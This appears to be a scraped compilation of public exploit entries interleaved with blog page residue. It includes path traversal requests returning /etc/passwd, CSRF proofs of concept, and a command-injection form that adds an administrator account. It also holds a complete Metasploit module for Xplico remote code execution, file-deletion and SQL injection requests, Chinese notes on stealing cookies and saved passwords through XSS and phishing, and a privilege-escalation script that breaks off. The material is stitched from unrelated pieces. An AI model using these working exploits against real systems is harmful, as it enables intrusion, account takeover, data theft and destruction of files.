# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
1. download.php -> file_name parameter
2. viewing.php -> file_name parameter
### Vulnerability 1 - download.php
GET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:17:58 GMT
..snip..
Content-Type: application/octet-stream
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
### Vulnerability 2 - viewing.php
GET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:19:49 GMT
Server: Apache/2.4.10 (Ubuntu)
..snip..
Content-Type: text/plain;charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863589117
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
# Exploit Title: XuezhuLi FileSharing - CSRF(Add User)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/FileSharing/signup.php" method="POST">
<input type="hidden" name="sign" value="ok">
<input type="hidden" name="newuser" value="csrf_test">
<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
<!--
Output.
#> cat /srv/userlists.txt
aaaa
csrf_test
-->
#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: XtMediaPlayer - 0.93 Memory Corruption PoC
#[+] Date: 16-06-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7
#[+] Vendor: http://downloads.sourceforge.net/project/xtmediaplayer/XtMediaPlayer/XtMediaPlayer_0.93_Win.rar
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
import os
os.system("color 02")
print"###########################################################"
print"# Title: XtMediaPlayer - 0.93 Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
filename = "crash.wav"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()
它仅适用于想法组织,但没有提供实际的用法代码,请自己收集。
1.Phpinfo Page
锻造另一方的身份以访问同一网站的phpinfo页面。由于具有相同的域,因此可以通过Ajax提交访问读取witlseText,其中$ _server [“ http_cookie”]将使用httponly属性打印出cookie。
优点:成功率很高,最不容易检测到,也是最常用的方法。
缺点:需要phpinfo页面,条件很恶劣。
2。框架钓鱼
通过iFrame标签嵌入了一个远程域,并且在完全扩展后,它覆盖了原始页面。
优点:没有跳跃,没有更改域名。
缺点:通常涵盖普通页面,管理员很容易检测到。
3。跳钓
通过购买相似的域名,构建相同的网络钓鱼页面并使受害者跳到网络钓鱼站。
优势:强有力的倡议,可以主动采取行动。
缺点:成本很高,并且由于页面跳跃太明显,因此此方法很容易检测到。
4.历史密码
通过JS锻造登录表格,并欺骗浏览器自动填充,从而获得浏览器记住的历史密码。
优点:不容易发现,可以直接获得纯文本,并以很高的成功率获得。
缺点:每个内核浏览器的兼容性不同,最新版本的Google不再支持HTTP协议下的自动填充功能。
5。获取源代码
通过XSS获取后端页面源代码,您通常可以找到一些未经授权的访问权限,或与CSRF合作以添加新用户或执行其他功能,并通过审核后端JS等发现一些漏洞。
优点:信息可详细获取,您也可以获取背景帐户名称。
缺点:它具有很大的局限性,并且不容易使用。
欢迎大师添加。
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c:\\windows\\system32\\cmd.exe"" />
<input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Xplico Remote Code Execution',
'Description' => %q{
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal
command under the context of the root user.
The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2017-16666'],
['URL', 'https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/'],
['URL', 'https://www.xplico.org/archives/1538']
],
'Privileged' => true,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'RPORT' => 9876
},
'Payload' =>
{
'Space' => 252,
'DisableNops' => true,
'BadChars' => "\x2f\x22",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat gawk', # other cmd payloads can't fit within 252 space due to badchars.
},
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Oct 29 2017',
'DefaultTarget' => 0
))
end
def check
# There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection.
# which is not something we want to do for only check..!
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
)
if res && res.code == 302
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Unknown
end
end
def initiate_session
print_status('Initiating new session on server side')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
)
if res && res.code == 200
res.get_cookies
else
nil
end
end
def register_user(username, password)
# First thing first, we need to get csrf token from registration form.
print_status('Registering a new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from registration form.')
end
# rand_mail_address sometimes generates buggy email address for this app. So we manually generate email address in here.
email = ''
email << rand_text_alpha_lower(rand(10)+4)
email << '@'
email << rand_text_alpha_lower(rand(10)+4)
email << '.'
email << rand_text_alpha_lower(rand(1)+2)
# Create user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][email]' => email,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.code == 302
print_good('New user successfully registered')
print_status("Username: #{username}")
print_status("Password: #{password}")
else
fail_with(Failure::Unknown, 'Could not register new user')
end
# Awesome. We have user. We need to activate it manually..!
print_status('Calculating em_key code of the user')
unixtime = Time.parse(res.headers['Date']).to_i
password_md5 = Rex::Text.md5(password)
em_key = Rex::Text.md5(
"#{email}#{password_md5}#{unixtime}"
)
print_status("Activating user with em_key = #{em_key}")
# We need to follow redirections. Even if we managed to find em_key.
# It will redirect us to the login form. We need to see registration completed on final page.
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key),
'cookie' => @cookie
)
if res && res.code == 200 && res.body.include?('Registration Completed.')
print_good('User successfully activated')
else
fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
end
end
def login(username, password)
# yet another csrf token gathering.
print_status('Authenticating with our activated new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from login form.')
end
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.body.include?('<a href="/pols">Cases</a>')
print_good('Successfully authenticated')
else
fail_with(Failure::Unknown, 'Unable to login.')
end
end
def create_new_case
# We logged in. Not we need to create a new xplico case.
print_status('Creating new case')
pol_name = rand_text_alpha_lower(rand(4)+8)
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'pols', 'add'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[Capture][Type]' => 0,
'data[Pol][name]' => pol_name,
'data[Pol][external_ref]' => '',
}
)
if res && res.body.include?('The Case has been created')
res.body.scan(/<a href="\/pols\/view\/([0-9]+)">/).flatten[0]
else
nil
end
end
def create_new_sol(pol_id)
# Since we xplico case, it's time to create a "session" for this case.
print_status('Creating new xplico session for pcap')
sol_name = rand_text_alpha_lower(rand(4)+8)
# sols/add endpoint reads selected case id through session.
# So we need to hit that end-point so we can insert pol_id into the current session data.
send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'pols', 'view', pol_id),
'cookie' => @cookie,
)
# Creating new session.
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sols', 'add'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[Sol][name]' => sol_name,
}
)
if res && res.body.include?('The Session has been created')
res.body.scan(/<a href="\/sols\/view\/([0-9]+)">/).flatten[0]
else
nil
end
end
def upload_pcap(sol_id)
print_status('Uploading malformed PCAP file')
# We are hitting this end-point so we can access sol_id through session on server-side.
send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
# Reading malformed pcap files.
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2017-16666', 'dump.pcap')
fd = ::File.open( path, 'rb')
pcap = fd.read(fd.stat.size)
fd.close
data = Rex::MIME::Message.new
data.add_part('POST', nil, nil, 'form-data; name="_method"')
data.add_part(pcap, 'application/octet-stream', nil, "form-data; name=\"data[Sols][File]\"; filename=\"`#{payload.encoded})`\"") # Yes back-tick injection!
# Uploading PCAP file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sols', 'pcap'),
'cookie' => @cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
if res && res.code == 302
print_good('PCAP successfully uploaded. Pcap parser is going to start on server side.')
end
# We can not wait all the day long to have session.
# So we are checking status of decoding process 5 times with sleep for a 1 second on each loop.
is_job_done = nil
counter = 0
until session_created? || !is_job_done.nil? || counter == 5
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
if res && res.body.include?('File uploaded, wait start decoding...')
print_status('Parsing has started. Wait for parser to get the job done...')
end
if res && res.body.include?('DECODING')
print_good('We are at PCAP decoding phase. Little bit more patience...')
end
# Tbh decoding process is not going to be finished as long as we have msf session.
# We are not going to see this case if we are successful exploiting.
if res && res.body.include?('DECODING COMPLETED')
print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
is_job_done = 1
next
end
sleep(1)
counter += 1
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
# We need to access cookie from everywhere. Thus making it global variable.
@cookie = initiate_session
if @cookie.nil?
fail_with(Failure::Unknown, 'Unable to initiate new sessionid on server.')
end
# We only need to access username and password for login func. Let's leave them as a local variables.
password = rand_text_alpha(32)
username = rand_text_alpha_lower(rand(8)+8)
register_user(username, password)
login(username, password)
# We will need to have pol_id for creating new xplico session.
pol_id = create_new_case
if pol_id.nil?
fail_with(Failure::Unknown, 'Unable to create New Case.')
end
print_good("New Case successfully creted. Our pol_id = #{pol_id}")
# Create xplico session by using pol_id
sol_id = create_new_sol(pol_id)
if sol_id.nil?
fail_with(Failure::Unknown, 'Unable to create New Sol.')
end
print_good("New Sols successfully creted. Our sol_id = #{sol_id}")
# Uploading malformed PCAP file. We are exploiting authenticated cmd inj in here.
upload_pcap(sol_id)
end
end
source: https://www.securityfocus.com/bid/49007/info
Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.
$ touch y # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory
XPCOM Race Condition
Vendor: Mozilla
Product: XPCOM
Version:
Website: http://www.mozilla.org/projects/xpcom/
CVE: CVE-2005-2414
OSVDB: 18226
PACKETSTORM: 38837
Description:
xpcom, or cross platform component object model is a framework for writing cross-platform, modular software. The xpcom library is used in many applications including a majority of the popular browsers such as FireFox, NetScape, Mozilla, Galeon, etc. It seems that there is a race condition of sorts in xpcom that makes it possible for an attacker to crash a victims browser by having them view a malformed html document. This issue is not believed to be exploitable by the Mozilla dev team, and will likely be addressed in full at a later date by the development team.
XPCOM Race Condition:
It is possible for an attacker to create a race condition that will cause an access violation and result in a hard crash of the browser. One way to trigger this issue is by taking a decent sized html file and loading a dom call within some nested divs that will cause part of the page currently being rendered to be deleted. If the page has not loaded by the time the dom call is made then we can delete objects that have yet to be referenced, which will result in a crash as soon as the browser tries to reference the deleted object.
http://www.gulftech.org/wrecko.html
The above link is a simple proof of concept I wrote a few months ago to show the developers how the issue could be used to cause a crash of the affected web browser. Due to time constraints I have not got to look into this issue very in depth, but it may be possible to use the race condition described here in combination with other dom calls or javascript to produce different results than those demonstrated in my proof of concept.
Solution:
Mozilla have been aware of this issue for some months, and have fixed the issue on trunk, but not on branch. The reason for this as stated by one of the developers is "fixes for this stuff could easily cause regressions". I did test this issue on the latest copy of the mozilla browser (Deer Park) this morning though, and it seemed to NOT be vulnerable. However, firefox and the like are still affected.
Credits:
James Bercegay of the GulfTech Security Research Team
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://xos-shop.com
# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9
# Version: 1.0.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1
################
# Description #
################
# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
##########
# PoC 1 #
##########
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php
Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php
Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Manufacturers > edit any manufacturer
3. Upload any image as "Manufacturers Image" and click save button
4. Then, tick "Delete" checkbox and click save button
5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image".
# Assumed there is a backup.conf file in web root
PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root
Request:
========
POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678
Content-Length: 1305
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[2]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[1]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[3]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[2]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[1]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[3]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="delete_manufacturer_image"
true
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="current_manufacturer_image"
../../backup.conf
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_image"; filename=""
Content-Type: application/octet-stream
-----------------------------120849309142309531191692203678--
---
##########
# PoC 2 #
##########
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php
Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php
Note: Multiple parameters affected
Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Categories/Products > edit any category
3. Upload any image as "Category Image" if there is no existing image and click save button else,
4. Tick "Delete" checkbox and click save button
5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image".
# Assumed there is a backup.conf file in web root
PoC #2) param current_category_image - Deleting backup.conf file in web root
Request:
========
POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599
Content-Length: 2524
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_id"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_category_image"
../../../backup.conf
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="category_name"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_categories_or_pages_status"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="delete_category_image"
true
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_image"; filename=""
Content-Type: application/octet-stream
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="product_list_b"
0
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="sort_order"
10
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_status"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[2]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[1]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[3]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[2]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[1]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[3]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[2]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[1]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[3]"
-----------------------------95672159210084798032704634599--
---
# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1
# The affected version is prior to v1.0.9.
source: https://www.securityfocus.com/bid/65121/info
XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected.
http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
# Date: 2018-10-27
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: OpenBSD 6.3 and 6.4
# CVE : CVE-2018-14665
# raptor_xorgasm
#!/bin/sh
#
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit targets OpenBSD's cron in order to escalate privileges to
# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
# console, it works perfectly on pseudo-terminals connected via SSH as well.
#
# See also:
